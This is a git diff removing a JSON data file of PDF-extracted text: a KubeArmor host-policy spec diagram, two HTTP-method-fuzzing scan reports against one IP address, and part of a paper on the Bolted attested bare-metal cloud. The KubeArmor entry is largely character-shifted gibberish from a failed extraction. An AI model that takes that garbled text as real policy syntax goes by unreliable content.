diff --git "a/pdf_data.json" "b/pdf_data.json" --- "a/pdf_data.json" +++ "b/pdf_data.json" @@ -1,483 +1,3 @@ -[ - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "KubeArmor", - "file_name": "kubearmorhostpolicy-spec-diagram.pdf" - }, - "content": [ - { - "data": "NFUBEBUBname: [policy name]namespace: [namespace name]TQFDTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuOPEF4FMFDUPSNBUDI-BCFMTLFZ\u001eWBMVFQSPDFTT\nNBUDI1BUITQBUI\u001b\u0001PXOFS0OMZ\u001b\u0001GSPN4PVSDFQBUI\u001b\u0001\nNBUDI%JSFDUPSJFTPXOFS0OMZ\u001b\u0001GSPN4PVSDFQBUI\u001b\u0001EJS\u001b\u0001SFDVSTJWF\u001b\u0001\nNBUDI1BUUFSOTQBUUFSO\u001b\u0001PXOFS0OMZ\u001b\u0001GJMF\nNBUDI1BUITQBUI\u001b\u0001PXOFS0OMZ\u001b\u0001GSPN4PVSDFQBUI\u001b\u0001\nNBUDI%JSFDUPSJFT\nPXOFS0OMZ\u001b\u0001GSPN4PVSDFQBUI\u001b\u0001EJS\u001b\u0001SFDVSTJWF\u001b\u0001\nNBUDI1BUUFSOTQBUUFSO\u001b\u0001PXOFS0OMZ\u001b\u0001SFBE0OMZ\u001b\u0001SFBE0OMZ\u001b\u0001SFBE0OMZ\u001b\u0001\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuOFUXPSL\nNBUDI1SPUPDPMTQSPUPDPM\u001b\u0001\\\u0001UDQ\u0001]\u0001VEQ\u0001]\u0001JDNQ\u0001^GSPN4PVSDFQBUI\u001b\u0001DBQBCJMJUJFT\nNBUDI$BQBCJMJUJFTDBQBCJMJUZ\u001b\u0001\\\u0001OFU@SBX\u0001^GSPN4PVSDFQBUI\u001b\u0001TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nList\nList\nListList\nList\nListListListOptional\nOptional\nOptional\nOptionalOptionalOptionalOptionalOptionalOptionalOptional\nOptionalOptionalMandatoryMandatory\nMandatory if these are not de\ufb01ned in each ruleKubeArmorHostPolicy Spec Diagram\nBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^Key Di\ufb00erence between KubeArmorPolicy and KubeArmorHostPolicyKubeArmorPolicy \u2014 action: {Allow | Audit | Block}KubeArmorHostPolicy \u2014 action: {Allow | Audit | Block}In the case that \u2018fromSource\u2019 is de\ufb01ned, then \u2018Allow\u2019 is available.No Namespace in the case of KubeArmorHostPolicy\nnodeSelector (not selector)\nListListListList\nListList" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-14 19_13_47.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin Project 6/Security Test Suite 1/http://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 19:13:47\nTime taken 00:00:08.369\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest PURGE http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codesAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest COPY http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest UNLOCK http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest LOCK http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod LOCK\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest PROPFIND http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest PATCH http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest TRACE http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNINGEndpoint http://164.90.157.161/\nRequest OPTIONS http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest HEAD http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest DELETE http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest PUT http://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod PUT\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest POST http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod POST\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-19 16_03_58.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin REST Project 3/https://164.90.157.161 Test Suite/https://164.90.157.161 Test Case 1\nSummary\nStarted at 2021-04-19 16:03:58\nTime taken 00:05:00.716\nTotal scans performed: 2189\nIssues found: 2\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingRequest 1 2 2\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest OPTIONS https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest HEAD https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #2" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "Keylime", - "file_name": "hotcloud18.pdf" - }, - "content": [ - { - "data": "A Secure Cloud with Minimal Provider Trust\u0003\nAmin Mosayyebzadeh1, Gerardo Ravago1, Apoorve Mohan6, Ali Raza1, Sahil Tikale1,\nNabil Schear2, Trammell Hudson3, Jason Hennessey1;4,\nNaved Ansari1, Kyle Hogan5, Charles Munson2,\nLarry Rudolph3, Gene Cooperman6, Peter Desnoyers6, Orran Krieger1\n1Boston University, Boston, MA2MIT Lincoln Laboratory, Lexington, MA3Two Sigma, New York, NY4NetApp Inc.\n5MIT, Cambridge, MA6Northeastern University, Boston, MA\nAbstract\nBolted is a new architecture for a bare metal cloud with the\ngoal of providing security-sensitive customers of a cloud\nthe same level of security and control that they can obtain in\ntheir own private data centers. It allows tenants to elastically\nallocate secure resources within a cloud while being protected\nfrom other previous, current, and future tenants of the cloud.\nThe provisioning of a new server to a tenant isolates a bare\nmetal server, only allowing it to communicate with other\ntenant\u2019s servers once its critical firmware and software have\nbeen attested to the tenant. Tenants, rather than the provider,\ncontrol the tradeoffs between security, price, and performance.\nA prototype demonstrates scalable end-to-end security with\nsmall overhead compared to a less secure alternative.\n1 Introduction\nDespite all the advantages of today\u2019s public clouds, many se-\ncurity sensitive organizations are reluctant to use them because\nof their security challenges and the trust that the tenant needs\nto place in the cloud provider. Can we make a cloud that is\nappropriate for even the most security sensitive tenants? Can\nwe make a cloud where the tenant does not need to fully trust\nthe provider? Can we do this without hurting the performance\nof tenants that do not wish to pay for extra security?\nThe key security challenge of Infrastructure-as-a-Service\n(IaaS) clouds stems from collocating multiple tenants on a sin-\ngle physical node with virtualization. Malicious tenants can ex-\n\u0003DISTRIBUTION STA TEMENT A. Approved for public release: distribution\nunlimited. This material is based upon work supported by the Assistant Secretary of De-\nfense for Research and Engineering under Air Force Contract No. FA8721-05-C-0002\nand/or FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations\nexpressed in this material are those of the author(s) and do not necessarily reflect the\nviews of the Assistant Secretary of Defense for Research and Engineering. Delivered to\nthe U.S. Government with Unlimited Rights, as defined in DFARS Part 252.227-7013\nor 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government rights in\nthis work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed\nabove. Use of this work other than as specifically authorized by the U.S. Government\nmay violate any copyrights that exist in this work.ploit vulnerabilities in the huge trusted computing base (TCB)\nto launch attacks on tenants running on the same node [29]\nor even worse, if the attacker compromises the hypervisor, to\nlaunch attacks on the cloud provider. Moreover, virtualization\nenables side-channel and covert channel attacks such as the\nrecent Meltdown and Spectre exploits [31, 34, 35, 44, 45].\nRecent processor secure enclave technology Intel SGX\nhas suffered from its own security challenges from the\ncollocation of multiple tenants [10, 16, 33, 40, 52]. Such\nsecurity concerns keep huge sections of the economy, such\nas medical companies and hospitals, financial institutions,\nfederal agencies etc., from being able to take advantage of\nthe benefits of today\u2019s clouds. [6,8,11,42]1\nBare metal clouds [27, 28, 41, 43, 48] remove the threat\nof side-channel attacks and covert channels implicit in\nvirtualization. However, all the existing bare metal clouds\nstill require the tenant to fully trust the provider which may\nnot always be a safe assumption. Consider how one protects\nagainst server firmware attacks. If a prior tenant of a node is\nable to inject malicious firmware, this modified firmware can\nbe used to attack future tenants of that server. Existing clouds\nprotect against firmware attacks on the tenant\u2019s behalf [15,27]\nbut there is no way for the tenant to verify, for example, that\nthe provider was not compromised or even has installed all\nfirmware security patches.\nBolted differs from today\u2019s bare metal clouds by reducing\nthe implicit trust in the provider. Bolted allows a tenant to elas-\ntically carve out a secure private enclave of commodity phys-\nical servers in which she may run applications. The enclave\nis protected from previous users of the same servers (using\nhardware-based attestation), concurrent tenants of the cloud\n(using network isolation and encryption), and future users of\nthe same servers (using storage encryption and memory scrub-\n1IARPA recently released RFI [7] describing the requirements of\none security-sensitive community to replicating as closely as possible\nthe properties of an air-gapped private enclave . We believe that meeting\nthis requirement would alleviate the concerns of a broad community of\nsecurity-sensitive customers, making the geographical distribution, elasticity,\nand on-demand pricing of cloud available to a wide community of users.bing). With Bolted an organization with security expertise is\nable to deploy their own attestation infrastructure, and can di-\nrectly validate the measurements against their expectations of\nfirmware and software deployed. Each Bolted component ad-\ndresses a different potential vulnerability. It is the combination\nof Bolted components that minimizes the role of the provider\nto mostly that of securing the physical access to the hardware.\nWe have implemented a prototype of Bolted and demon-\nstrate that the prototype can provision an enclave of sixteen\nservers with a full application environment with legacy servers\nand firmware in around 8 minutes, enabling highly elastic\nenvironments. We show that the overhead to do attestation\nwith Bolted is low, adding only 25% to the cost of a highly\noptimized provisioning system. Replacing traditional UEFI\nfirmware with a customized Linux-based firmware we devel-\noped for this service, we further improve the security of the\nuser and reduce provisioning time to being around 10% faster\nthan the unattested version; a node can be fully provisioned\nwith a full application environment in just over 3 minutes.\n2 Threat Model\nOur goal in Bolted is to enable tenants to strongly isolate\nthemselves from other tenants while placing as little trust in\nthe provider as possible. Specifically, we trust the provider\nto maintain the physical security of the hardware, so physical\nattacks like bus snooping or de-capping chips are out of scope.\nWe also trust the provider for availability of the network\nand node allocation services and any network performance\nguarantees. We assume that all cloud provider nodes are\nequipped with Trusted Platform Modules (TPMs) [5].\nWe categorize the threats that the tenant faces into the\nfollowing phases:\nPrior to occupancy: Malicious (or buggy) firmware can\nthreaten the integrity of the secure enclave of which the node\nbecomes a part. We must ensure that a previous tenant (e.g., by\nexploiting firmware bugs) or cloud provider insider (e.g., by\nunauthorized firmware modification) did not infect the node\u2019s\nfirmware prior to the tenant receiving it. Further, we must\nensure that the node being booted is isolated from potential at-\ntackers until it is fully provisioned and all defenses are in place.\nDuring occupancy: Although many side-channel attacks\nare avoided by disallowing concurrent tenants on the same\nserver, we must ensure that the node\u2019s network traffic is\nisolated so that the provider or other concurrent tenants of\nthe cloud cannot launch attacks against it or eavesdrop on its\ncommunication with other nodes in the enclave. Moreover,\nif network attached storage is used (as in our implementation)\nall communication between storage and the node must be\nsecured.\nAfter occupancy: We must ensure that the confidentiality\nof a tenant is not compromised by any of its state (e.g, storage\nor memory) being visible to subsequent software running on\nthe node.3 Design Philosophy\nA central design principle of Bolted is to enable as much func-\ntionality as possible to be implemented by the tenant rather\nthan by the provider for three reasons: (i) to minimize the\ntrust that a tenant needs to place in the provider, (ii) to enable\ntenants with specialized security expertise and requirements\nto implement functionality themselves, and (iii) to enable\ntenants to make their own cost/performance/security tradeoffs.\nThis principle has a number of implications for our design.\nFirst, Bolted differs from existing bare metal offerings in\nthat most of the component services that make up Bolted can\nbe operated by a tenant rather than by the provider. A security\nsensitive tenant can customize or replace these services. All\nthe logic, that orchestrates how different services are used\nto securely deploy a tenant\u2019s software, is implemented using\nscripts that can be replaced or modified by the user.\nSecond, while we expect a provider to secure and isolate the\nnetwork and storage of tenants, we only rely on the provider\nfor availability and not for the confidentiality or integrity of\nthe tenant\u2019s computation. In the most secure deployments,\nwe assume that Bolted tenants will further encrypt all\ncommunication between the tenants\u2019 nodes and between\nthose nodes and storage. Bolted provides a (user-operated)\nservice to securely distribute keys for this purpose.\nThird, we rely on attestation (measuring all firmware\nand software and ensuring that it matches known good\nvalues) that can be implemented by the tenant rather than\njust validation (ensuring that software/firmware is signed by a\ntrusted party). This is critical for firmware which may contain\nbugs [12, 20, 24, 25, 46, 49] that can disrupt tenant security.\nAttestation provides a time-of-use proof that the provider has\nkept the firmware up to date. More generally, we attest through\nthe process of incorporating a node into an enclave, and we\ncan also continuously attest when the node is operating, to\nensure that bugs in any layer of software (irrespective of who\nsigned them) have not allowed malicious code to be executed.\nFourth, we have a strong focus on keeping our software as\nsmall as possible and making it all available via open source.\nIn some cases, we have written our own highly specialized\nfunctionality rather than relying on larger function rich general\npurpose code in order to achieve this goal. For functionality\ndeployed by the provider, this is critical to enable it to be\ninspected by tenants to ensure that any requirements are met.\nFor example, previous attacks have shown that firmware se-\ncurity features are difficult to implement bug-free \u2013 including\nfirmware measurements being insufficient [13], hardware\nprotections against malicious devices not being in place [38],\nand dynamic root of trust (DRTM) implementation flaws [51].\nFurther, our firmware is deterministically built, so that the\ntenant can not only inspect it for correct implementation but\nthen attest that this is the firmware that is actually executing\non the machine assigned to the tenant. For tenant deployed\nfunctionality, small open source implementations are valuableto enable user-specific customization.\n4 Architecture\nThe architecture of Bolted and the sequence that a node goes\nthrough as part of being admitted to a tenant enclave is shown\nin Figure 1. The state of the node changes as a result of its\ninteraction with the three main services that comprise the\nBolted system. Like any bare metal offering, Bolted requires,\nanisolation service which allocates nodes and configures\nnetworks to isolate those nodes from nodes of other tenants\nand a provisioning service to provision the user\u2019s operating\nsystem and applications onto the allocated nodes. The Bolted\narchitecture adds a third: an Attestation Service .\nThe attestation service consists of a server and a client\ncomponent that runs in the firmware of the node. The\nserver is responsible for: 1) maintaining a whitelist of trusted\nfirmware/software measurements, 2) comparing quotes (hash\nmeasurements signed by the TPM) of firmware/software\nagainst the whitelist, 3) maintaining a registry of TPM to\nnode mappings to verify quotes by the TPM and ensure that\nthe quotes are coming from an expected node in the cloud, and\n4) distributing keys to nodes so that they may encrypt commu-\nnication between them as well as securely accessing storage.\nThe client component is responsible for participating the\nnode in the attestation protocol. On boot, the hardware mea-\nsures the first portion of firmware that in turn measures the re-\nmainder of the firmware and the next code (e.g., a bootloader)\nbefore it is executed. That code in turn loads, measures and\nthen executes subsequent software, etc. These measurements\nare all stored in the TPM. The client obtains quotes from\nthe TPM, i.e., cryptographically signed measurements of the\nfirmware and software that are loaded and executed on the\nnode. The client securely provides the quotes to the attesta-\ntion server, which then matches them to its whitelist. The\ncompromised software will not match the whitelist and the\ninfected node will be rejected. Upon successful attestation, the\nverifier securely provides the node a cryptographic key that\ncan bootstrap encrypted storage and network isolation. At this\npoint, the node is acquired by the tenant. It is critical that client\nfirmware and software be open, simple, verifiable, and, ideally,\ndeterministically built to enable reliable and secure attestation.\n5 Implementation\nWe have developed a prototype of the Bolted architecture.\nHere, we briefly describe the implementation components\nof the three main services, the node firmware we use and how\nthese components work together.\nHardware Isolation Layer: The Hardware Isolation Layer\n(HIL) [21] is our implementation of the Bolted isolation\nservice. The fundamental operations HIL provides are (i)\nallocation of physical nodes, (ii) allocation of networks, and\n(iii) connecting these nodes and networks. A tenant can invoke\nHIL to allocate nodes to an enclave, create a management\nIsolation \nService Attestation \nService Provisioning \nService \nFree Pool \nAirlock \nRejected Pool \nTenant Enclave \n4 Download \nbootloader and client \nside attestation \nsoftware Attest Node\u2019s \nFirmware \nIf Attestation \nfails: moves the \nnode to rejected \npool If Attestation passes: \nmove the node \nto tenant\u2019s \nenclave \nProvision \nthe node \nwith tenant\u2019s \nOS and \napplications Allocate a node \nand move it into \nAirlock which is \na quarantined \nstate where node \nis isolated 1 3 5 \n6 7 \n2 \nRun Secure \nFirmware Figure 1: Bolted\u2019s architecture: Blue arrows show state\nchanges and green dotted lines show actions taken by each\nservice.\nnetwork between the nodes, and then connect this network to\nany provisioning tool (e.g., [9,14,17,36]). She can then create\nadditional networks for isolated communication between\nnodes and/or attach those nodes to public networks made\navailable by the provider. HIL is a very simple service\n(approximately 3000 LOC). It creates networks (currently\nVLANs [26]) and attaches nodes to them by interacting with\nthe switches of the provider.\nMalleable Metal as a Service: The Malleable Metal-as-a-\nService (M2) [36] is our implementation of the Bolted provi-\nsioning service. The fundamental operations M2 provides are:\n(i) create (disk) image, (ii) clone and snapshot an image, (iii)\ndelete an image, and (iv) boot a node from an image. Similar\nto virtualized cloud services, M2 services images from\nremote-mounted boot drives. Images are exposed to the nodes\nvia an iSCSI (TGT [19]) service managed by M2 and stored in\na Ceph [50] distributed file system. As published previously,\nM2 is between 3-4 times faster than traditional provisioning\nsystems that install an image into a server\u2019s local disk [36].\nKeylime: Keylime [47] is our implementation of the\nBolted attestation service. It is divided into four components:\nRegistrar, Cloud V erifier, Client and Tenant. The registrar\nmaintains the node to TPM mapping. The verifier maintains\nthe whitelist of trusted code and checks nodes\u2019 integrity. The\nKeylime client is downloaded and measured by the node\nfirmware and then passes quotes from the node\u2019s TPM to the\nverifier. Keylime Tenant starts the attestation process and asks\nV erifier to verify the node which runs Keylime client.\nHeads: Heads [23] is our firmware implementation and\nbootloader replacement. It is a minimal deterministically\nbuilt version of Linux that (i) zeroes all node memory,\n(ii) downloads the Keylime client, and (if attestation has\nsucceeded) (iii) downloads and kexecs to a tenant\u2019s kernel.\nIn the future, we expect to directly mount the iSCSI disk fromUn-Attested\n stock UEFIAttested\n stock UEFIAttested Heads0100200300400Single Node\nProvisioning Times (Seconds)Power-On-Self-Test (POST)\nPXE\nChainboot into iSCSI\ntarget using iPXE\nHeads Download\n and Measurement(iPXE)\nHeads BootingDownload Keylime Client\nAttestation\nMoving to enclave\nKexec into attested\nkernel and bootFigure 2: Performance with and without Bolted for systems\nwith stock UEFI firmware.\nM2 to obtain the kernel, but currently, we fetch the kernel\nfrom a web service stood up for this purpose.\nPutting it together: The booting of a node is controlled by\na Python application that follows the sequence of steps shown\nin Figure 1. Secure OS images contain a Keylime client that\nobtains a key to encrypt network traffic between nodes in\nthe enclave as well as traffic to the boot disk mounted using\niSCSI. For servers that support it, we burn Heads directly\ninto the server\u2019s flash, and for the other servers, we download\nHeads from a PXE service stood up for this purpose and\nthen continue the same sequence as if Heads was burned into\nthe flash. We have modified iPXE client code to measure\nthe downloaded Heads image into a TPM register so that all\nsoftware involved in booting a node can be attested.\n6 Evaluation\nWe show performance results from our initial prototype im-\nplementation of Bolted. Timing breakdowns are shown using\na Dell R630 server with 256 GB RAM and 2 2.6GHz 10 (20\nHT) core Intel Xeon processors model E5-2660 v3. We have\nphysical access to this server in our lab and show experiments\nwith both stock UEFI firmware and our own Heads firmware.\nScalability experiments are shown on 16 Dell M620 blade\nserves with 64 GB memory and 2 2.60GHz 8 (16 HT) core\nXeon E5-2650 v2 processors connected to a 10Gbit switch.\nFigure 2 shows the timing breakdown of different stages\nof provisioning a 20 GB image of pre-installed linux with\nBolted. The three scenarios are: 1) an unattested boot that\njust uses M2 to directly boot a users image, 2) fully attested\nboot with stock UEFI firmware, and 3) fully attested boot\nwith Heads burnt into the flash.\nWithout Bolted\u2019s security features, a server node provi-\nsioning via M2 takes three steps: Power-on-self-test (POST),\nPXE, and then chainbooting from an iSCSI target using iPXE.The total time is under 4 minutes with 2.5 minutes spent in\nthe POST step alone.\nFor full attestation using stock UEFI firmware, after\nPOST, Bolted goes through the following phases: (i) PXE\ndownloading iPXE, (ii) iPXE downloading and measuring\nHeads, (iii) booting Heads, (iv) download the Keylime client\n(currently using http) and measuring it, (v) running the\nKeylime client, registering the node and attesting it, and then\ndownloading (currently using http) and measuring the tenants\nkernel, (vi) moving the node into the tenants enclave and, and\nfinally (vii) Heads kexec to the tenants kernel and it is booted2.\nWith all these steps the total time to provision a server is just\nover 5 minutes or around 25% more than the unattested boot.\nFor full attestation using Heads firmware, after POST we\nimmediately jump to step 4 above. Heads posts in just under\na minute (almost half of which on this server is a timeout\nwaiting for Intel Management Engine to initialize). With\nHeads burned into the firmware total provisioning time is 35%\nfaster than the fully attested case with stock firmware and\neven 10% faster than the unattested case with stock firmware.\n2 4 6 8 10 12 14 16\nNumber of bare-metal nodes provisioned concurrently0100200300400500600Time (Seconds)Bolted Provisioning Time\nM2 Provisioning Time\nFigure 3: Scaling Results.\nFigure 3 shows (with UEFI firmware) the scalability of\nBolted with and without attestation as we increase the number\nof concurrently booting nodes. Each experiment was run five\ntimes, and the line shows the degradation in performance\nfor the average of those runs as we increase the number of\nnodes from one to sixteen. With sixteen servers booting\nconcurrently, performance degrades by around 50 seconds for\nthe unattested case and around 100 seconds for the attested\ncase. Degradation in the unattested experiments is due to a\nlarge number of concurrent block requests to the small scale\nCeph deployment (with only 27 disks). Experiments [36]\nwith a larger scale Ceph deployment demonstrated better M2\nscalability. Performance of a fully attested boot degrades by\nonly 13% as we move to 16 servers.\n2This implementation is a very early prototype, and we expect to be able\nto speed up steps 4 and 5 by incorporating iSCSI drivers into our Heads\nimplementation.7 Discussion\nIn this paper, we describe Bolted, an architecture for a bare\nmetal cloud that is appropriate for even the most security sensi-\ntive tenants. For these tenants, Bolted enables protection from\nattacks: (i) prior to occupancy using attestation to ensure that\nany nodes with compromised firmware are rejected and by\nisolating nodes (in airlocks) until they can be added to tenant\nenclaves, (ii) during occupancy by allocating entire servers to\navoid virtualization attacks and by providing a secure model\nto distribute tenant keys for encrypting storage and network\ntraffic, (iii) after occupancy by using firmware that scrubs\nmemory prior to booting other software and using M2 for\nnetwork mounted storage. The only trust these tenants need\nto place in the provider is: (a) the availability of the resources\nand (b) that the physical hardware has not been compromised.\nThe only Bolted service that needs to be deployed by a\nprovider is the isolation service (e.g., HIL), which needs to be\ntrusted by the provider to control the physical switches. All\nother services can be deployed by a tenant or on their behalf\nby a third party and the orchestration to enable an attested boot\nis managed by scripts controlled by the tenant. This means\nthat a security sensitive tenant can operate these services in\ntheir own environment. Customers with specialized needs\nmay choose to develop their own variants of these services.\nThe cost/complexity/performance/security trade-offs are\nfully under the tenants control. A tenant that doesn\u2019t want\nthe cost and complexity to deploy their own instance 